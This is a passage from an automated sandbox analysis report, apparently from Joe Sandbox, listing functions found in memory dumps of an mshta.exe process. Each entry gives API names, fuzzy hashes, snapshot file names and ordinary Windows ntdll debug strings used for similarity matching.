                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00B91DE0,00BA811F,00BA57DF,00B91DA3), ref: 00B98263
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: a90eefdab6c3186fc3f21299829f79aa8092fd2369db515f455c14661992b685
                                                                                                                                    • Instruction ID: e01d397a002806d433da27093762824dbe569df6b08cd6481a47310dd3356083
                                                                                                                                    • Opcode Fuzzy Hash: a90eefdab6c3186fc3f21299829f79aa8092fd2369db515f455c14661992b685
                                                                                                                                    • Instruction Fuzzy Hash: 79D05E716842003BEA40B7E4DC07F9636CC9B05754F0448B4FA0CDB2C3ED55E50146A5
                                                                                                                                    Function 03982C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: cddc98279e7d6be6fb79732af04c80194942380641e032b2aeb83889668b0424
                                                                                                                                    • Instruction ID: 8281bc1d75c40a35ecb9586cb4f4c817085a761a3472f5c7f5a406ca62ef9a70
                                                                                                                                    • Opcode Fuzzy Hash: cddc98279e7d6be6fb79732af04c80194942380641e032b2aeb83889668b0424
                                                                                                                                    • Instruction Fuzzy Hash: 70B09B719065C5C5FE11F764460C717794867D1741F19C4A6D2434645E4739C1D1E175

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 037604E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4841fbc7001f98443dc590d71886d6ab41d49b6bdb3c4b17ea997b6cc1d5ef84
                                                                                                                                    • Instruction ID: 73feb6556d092a0dc8a944519075cf48f8cd70b720da412aca2d93b07a2d9245
                                                                                                                                    • Opcode Fuzzy Hash: 4841fbc7001f98443dc590d71886d6ab41d49b6bdb3c4b17ea997b6cc1d5ef84
                                                                                                                                    • Instruction Fuzzy Hash: 1441E274A1CF0D4FD768EF6890A1676B3E2FB89300F50052DC88AC3652EB70E8468785
                                                                                                                                    Function 0376E06C Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                    • API String ID: 0-3558027158
                                                                                                                                    • Opcode ID: 4ea41fbc9c1cb3b5254c71cbdaf2432aa16b4c46cb70638361d44dc0addc8961
                                                                                                                                    • Instruction ID: 37242f0722e3744c864473ff74a38832cb0cb1e7bbe945fccc90e600706a94a1
                                                                                                                                    • Opcode Fuzzy Hash: 4ea41fbc9c1cb3b5254c71cbdaf2432aa16b4c46cb70638361d44dc0addc8961
                                                                                                                                    • Instruction Fuzzy Hash: 5A9150F04082988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                                                                                                    Function 0376E069 Relevance: 56.5, Strings: 45, Instructions: 212COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                    • API String ID: 0-3558027158
                                                                                                                                    • Opcode ID: 63ad2c9632a21fdda7d00ffeadc1703e7af064eff9224086e85292dfcef52d2f
                                                                                                                                    • Instruction ID: a7fc193aa4e6179ba3cb7b9507727eeb4118a796a2e869f2d7cd621d1c7f72c9
                                                                                                                                    • Opcode Fuzzy Hash: 63ad2c9632a21fdda7d00ffeadc1703e7af064eff9224086e85292dfcef52d2f
                                                                                                                                    • Instruction Fuzzy Hash: A39150F04082988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                                                                                                                    Function 03982890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: a7a22f6988f16339f1189cc0f82143a28ee15d65f12557588959887d1fe5394c
                                                                                                                                    • Instruction ID: 24c27cf493f214201c56f7b0025a990b34b04429565d8132efd7d19226c9152f
                                                                                                                                    • Opcode Fuzzy Hash: a7a22f6988f16339f1189cc0f82143a28ee15d65f12557588959887d1fe5394c
                                                                                                                                    • Instruction Fuzzy Hash: E151F8B5A00216BFCF20EF9CC98097EF7BCBB892407148969E4A5D7641D374DE50CBA0
                                                                                                                                    Function 039F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: fde66457722a4674c4c0e7ac87ae46cfa0f19257d5a4bb8a534a79ff1f04cc6d
                                                                                                                                    • Instruction ID: 831a35b59b27a6e457f3a5ac304d07de72dfb2a747fd914ebd8c77e16fdd856e
                                                                                                                                    • Opcode Fuzzy Hash: fde66457722a4674c4c0e7ac87ae46cfa0f19257d5a4bb8a534a79ff1f04cc6d
                                                                                                                                    • Instruction Fuzzy Hash: C751F8B9A04A45AFDB30DF5CC890A7FB7FDEB84240B048C5AE6E6D7641D7B4DA408760
                                                                                                                                    Function 03977630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • ExecuteOptions, xrefs: 039B46A0
                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039B46FC
                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 039B4655
                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 039B4742
                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 039B4725
                                                                                                                                    • Execute=1, xrefs: 039B4713
                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 039B4787
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                    • Opcode ID: b4898cc7e67fe0ceec7cf96ff8c88c27aa708957d4cbee2c8d28d1cdd815a8c7
                                                                                                                                    • Instruction ID: 133923bf0c3b51bd56d143234749a4a2194d53bc93dc4f2dcc030d1087823bed
                                                                                                                                    • Opcode Fuzzy Hash: b4898cc7e67fe0ceec7cf96ff8c88c27aa708957d4cbee2c8d28d1cdd815a8c7
                                                                                                                                    • Instruction Fuzzy Hash: A251D335A00219AADF20FBA99C85BFEB7BCAB84344F0404A9E505AB1D1E771AA45CF51
                                                                                                                                    Function 03A16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                    • Instruction ID: afdfd22c993b5553d789ce02d60d0b9ad8c15b0891fabb4995c239a2e6a67eae
                                                                                                                                    • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                    • Instruction Fuzzy Hash: 48021375608341AFC305DF18C994A6BBBF5EFC8710F048A2EF9899B264DB31E915CB52
                                                                                                                                    Function 0398B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-$0$0
                                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction ID: 793f19682b52fd82806e68514202ff921f4f14b25398c97a1b167a2862d80313
                                                                                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction Fuzzy Hash: AC81BE70E052499EDF24FF68C8917FEBBAAAFC53A0F1C465AD861A7790C73498408B54
                                                                                                                                    Function 039F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                                    • Opcode ID: 6fd24441c4ec98e6d23aa3eda6978eeb62919394d722b8f86006d37914f07070
                                                                                                                                    • Instruction ID: 5b843957b5e4ccf5179f5539a3727b164c0d0f171d08ca82dfdecdff580e8df4
                                                                                                                                    • Opcode Fuzzy Hash: 6fd24441c4ec98e6d23aa3eda6978eeb62919394d722b8f86006d37914f07070
                                                                                                                                    • Instruction Fuzzy Hash: 7E21517AE00219AFDB10EF69CC40AEFB7ECEF84684F480516EA55E7200E730D9018BA5
                                                                                                                                    Function 0396F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039B02E7
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039B02BD
                                                                                                                                    • RTL: Re-Waiting, xrefs: 039B031E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: 680c6809cc86ab02f2a3829b9c7eb896150e21a000e073c5b63949db64ca2b53
                                                                                                                                    • Instruction ID: 505d5ef6c33544097daac071abc48dc4fdd1906154bddcd2948dbf62379fd972
                                                                                                                                    • Opcode Fuzzy Hash: 680c6809cc86ab02f2a3829b9c7eb896150e21a000e073c5b63949db64ca2b53
                                                                                                                                    • Instruction Fuzzy Hash: ECE1DB316097419FD724CF28D984B6AB7E8BF88364F180A6DF4A68B3E1D774D844CB52
                                                                                                                                    Function 0397BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 039B7BAC
                                                                                                                                    • RTL: Resource at %p, xrefs: 039B7B8E
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 039B7B7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: ea43716332290993c400d0bb3c3c4eea1656f02cc7f5685cc803559bc15da650
                                                                                                                                    • Instruction ID: d4bf2ed96f83dba7255e566cf91b5d494ea44212a9f0bef88c0ea1339539f44a
                                                                                                                                    • Opcode Fuzzy Hash: ea43716332290993c400d0bb3c3c4eea1656f02cc7f5685cc803559bc15da650
                                                                                                                                    • Instruction Fuzzy Hash: BE41E2357047069FD724EE69C940B6AB7E9EFC9B10F040A1DF95ADB280DB31E5068B91
                                                                                                                                    Function 0397B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039B728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 039B7294
                                                                                                                                    • RTL: Re-Waiting, xrefs: 039B72C1
                                                                                                                                    • RTL: Resource at %p, xrefs: 039B72A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: 877f82be05b262b762b54931452d36537f9a6e84b9ae77c140f6faa25a784a32
                                                                                                                                    • Instruction ID: a847aab55fe667a0089926083752de295fa9e8d4c89a763708dea461b16fecb9
                                                                                                                                    • Opcode Fuzzy Hash: 877f82be05b262b762b54931452d36537f9a6e84b9ae77c140f6faa25a784a32
                                                                                                                                    • Instruction Fuzzy Hash: 3F41EE36704206ABC720DE64CD41BAAB7B9FFC4750F180A19F995AB280DB31E8528BD1
                                                                                                                                    Function 039F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                    • Opcode ID: e4777d2dfbcfd41145e8a520e2e3f660e7f520972c6880aa1df840c4ed82728f
                                                                                                                                    • Instruction ID: ddc3e43296e9fd4393b57751781bc86f8658166a8c0e8f89c9c30aaaa6659874
                                                                                                                                    • Opcode Fuzzy Hash: e4777d2dfbcfd41145e8a520e2e3f660e7f520972c6880aa1df840c4ed82728f
                                                                                                                                    • Instruction Fuzzy Hash: E4318CBAA006199FDB20DF29CC40BEEB7FCEF44650F444956E989D7240EB70DA458F61
                                                                                                                                    Function 03763B30 Relevance: 6.3, Strings: 5, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -dh*$.$)<$/2!8$:$dh,-
                                                                                                                                    • API String ID: 0-563082556
                                                                                                                                    • Opcode ID: 38d7908bec288636ef3d4a6826e577896e00bbf20f53884bf03314314af016f5
                                                                                                                                    • Instruction ID: 68b3d217e3ceabb2ff9b301c856780102571830f3b8ca2d19f40b2751196955a
                                                                                                                                    • Opcode Fuzzy Hash: 38d7908bec288636ef3d4a6826e577896e00bbf20f53884bf03314314af016f5
                                                                                                                                    • Instruction Fuzzy Hash: E9F0B4700087848BCB09AF14D4595AABBE1FF99309F50676DD48ADB261DB38D609CB06
                                                                                                                                    Function 03987D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: c3806e7089d35c7a052d116ad379b9664afd4f8f3dd15b3498c2d8c52306434e
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: 0591A871E002169BDF24EF9AC8816BEB7A9FFC43A0F78451AE865E72D0D7309940C760
                                                                                                                                    Function 03949126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: 1a8d103ae473d846ff6d3970c010e2088e829f02ac493d215846c74e716ed744
                                                                                                                                    • Instruction ID: e554599e349c2088e6ec4af9db6b17e9ae2697c2564461be1f3b406d58f881c7
                                                                                                                                    • Opcode Fuzzy Hash: 1a8d103ae473d846ff6d3970c010e2088e829f02ac493d215846c74e716ed744
                                                                                                                                    • Instruction Fuzzy Hash: E4812975D012699BDB31DB54CC44BEEB7B8AF48750F0446EAE919B7240D7309E85CFA0